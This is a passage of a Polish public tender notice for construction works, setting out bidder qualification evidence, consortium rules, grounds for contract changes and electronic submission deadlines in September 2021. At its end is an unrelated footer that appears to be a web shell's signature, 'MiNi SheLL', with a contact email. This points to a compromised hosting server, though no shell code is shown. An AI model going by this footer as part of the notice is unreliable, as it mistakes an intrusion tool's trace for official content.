powinien w wykazie robót wyraźnie określić przedmiot i wartość oraz zakres robót, aby można było ustalić, czy spełnia warunek udziału w postępowaniu;<br/>2)	Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP na dzień publikacji ogłoszenia;<br/>3)	Dopuszcza się, aby jedna osoba obejmowała więcej niż jedno stanowisko wymienione powyżej, pod warunkiem posiadania stosownych uprawnień<br/>4)	Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2020 r, poz. 1333 z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania;<br/>5)	Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117);<br/>6)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z Wykonawców powinien wykazać spełnienie warunku określonego w pkt 6.1.4 ppkt 1) lub 2) SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie; dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 1) SWZ,<br/>	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, ww. wykaz robót, dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ) – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 2) SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy<br/>czym Wykonawca może sporządzić ofertę wg innego wzorca - powinna ona wówczas<br/>obejmować dane wymagane dla oferty w SWZ i załącznikach);<br/>2) Oświadczenia o których mowa w pkt 8.1. SWZ – Załącznik nr 4 i 5 do SWZ;<br/>3) Oświadczenie, o którym mowa w pkt 8.2. SWZ (jeżeli dotyczy) – Załącznik nr 6 do SWZ;<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4. SWZ (jeżeli dotyczy) –<br/>Załącznik nr 9 do SWZ;<br/>5) Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu<br/>udostępniającego zasoby:<br/>a) Zmawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą<br/>odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów (miejsce do wskazania przedmiotowych danych zostało<br/>przewidziane w druku formularza ofertowego stanowiącego załącznik nr 3 do SWZ).<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a),<br/>zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby do złożenia wraz z<br/>ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania.<br/>6) Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) oświadczenia o których mowa w pkt 8.1. SWZ składa z ofertą każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2) w przypadku, o którym mowa w pkt 6.4. SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym.<br/>3) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt 8.3. SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w pkt 8.3.1. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku;<br/>3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian i uzupełnień postanowień zawartej umowy. Strony<br/>dopuszczają dokonywanie zmian treści umowy, w następujących okolicznościach:<br/>1) dopuszcza się wprowadzenie zmian i uzupełnień za zgodą Stron umowy,<br/>2) zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę,<br/>3) zmiany umowy, o których mowa w pkt 1) powyżej muszą być dokonywane z zachowaniem<br/>przepisu art. 454 oraz art. 455 ustawy Pzp.<br/>2. Zmiany, o których mowa mogą dotyczyć:<br/>1) zmian innych niż wymienione w art. 454 ust. 2 ustawy Pzp,<br/>2) wystąpienia siły wyższej;<br/>3) zmiany terminów realizacji przedmiotu umowy w przypadku:<br/>a) wystąpienie wyjątkowych okoliczności niezależnych od Stron umowy, których nie mogły one<br/>przewidzieć w chwili zawierania umowy, skutkujących możliwością niedotrzymania terminów<br/>zakończenia robót,<br/>b) wystąpienia uzasadnionych okoliczności zaistniałych w trakcie realizacji przedmiotu umowy,<br/>które utrudniają lub uniemożliwiają prawidłowe i terminowe wykonanie przedmiotu umowy;<br/>c) konieczności przebudowy uzbrojenia podziemnego nieujawnionego w dokumentacji<br/>projektowej, która utrudnia lub uniemożliwia prawidłowe i terminowe wykonanie przedmiotu<br/>umowy,<br/>d) wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez<br/>Zamawiającego lub inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub<br/>usunięcia tych kolizji,<br/>e) wystąpienia opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez<br/>właściwe organy administracji państwowej lub inne podmioty, które nie są następstwem<br/>okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>f) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których<br/>właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>g) jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich<br/>wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z<br/>przyczyn niezależnych od Wykonawcy,<br/>h) konieczności prowadzenia prac archeologicznych uniemożliwiających wykonywanie robót lub<br/>wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez<br/>Wykonawcę,<br/>i) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w<br/>sposób istotny od przyjętych w dokumentacji projektowej lub STWiORB, występowania<br/>niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń<br/>niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,<br/>j) gdy którykolwiek z Członków Konsorcjum złożył wniosek o ogłoszenie upadłości i z tej<br/>przyczyny zajdzie konieczność wstrzymania realizacji przedmiotu zamówienia, wówczas termin<br/>realizacji może zostać przedłużony o czas trwania przerwy w robotach, przy czym czas ten nie<br/>będzie dłuższy niż czas niezbędny do załatwienia wszelkich spraw związanych z przejęciem<br/>robót przez pozostałych Partnerów Konsorcjum,<br/>k) zmiany dokumentacji projektowej, jeżeli pomimo zachowania przez Zamawiającego należytej<br/>staranności w sprawdzeniu dokumentacji projektowej zostaną w niej wykryte wady lub usterki;<br/>Zamawiający w porozumieniu z autorem dokumentacji doprowadzi do ich usunięcia i uzgodni z<br/>Wykonawcą sposób wykonania robót budowlanych wynikający ze zmian tej dokumentacji,<br/>l) zmiany decyzji pozwolenia budowlanego lub zmiany do zgłoszenia robót nie wymagających<br/>pozwolenia na budowę;<br/>4) ...<br/>Ze względu na ograniczoną ilość znaków, szczegółowe informacje o zmianach umowy znajdują<br/>się w Projekcie Umowy stanowiącym Załącznik Nr 2 do SWZ. Wszystkie istotne postanowienia<br/>umowne Zamawiający zawarł w Projekcie umowy stanowiącym Załącznik Nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w formie elektronicznej lub postacielektronicznej opatrzonej podpisem zaufanym lub osobistym za pośrednictwem „Formularza dozłożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również naminiPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-09 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający:<br/>1) nie przewiduje wyboru najkorzystniejszej oferty z możliwością przeprowadzenia negocjacji,<br/>2) nie dopuszcza składania ofert częściowych,<br/>3) nie dopuszcza składania ofert wariantowych,<br/>4) nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy,<br/>5) nie przewiduje wymagań wskazanych w art. 94 ustawy,<br/>6) nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy,<br/>7) nie wymaga przeprowadzenia przez Wykonawcę obowiązkowej wizji lokalnej lub sprawdzenia<br/>przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust.<br/>2 ustawy,<br/>8) nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach obcych,<br/>9) nie przewiduje zwrotu kosztów udziału w postępowaniu,<br/>10) nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie<br/>z art. 60 i art. 121 ustawy,<br/>11) nie przewiduje zawarcia umowy ramowej,<br/>12) nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej wraz z<br/>informacjami, o których mowa w art. 230 ustawy,<br/>13) nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub<br/>dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy,<br/>14) nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com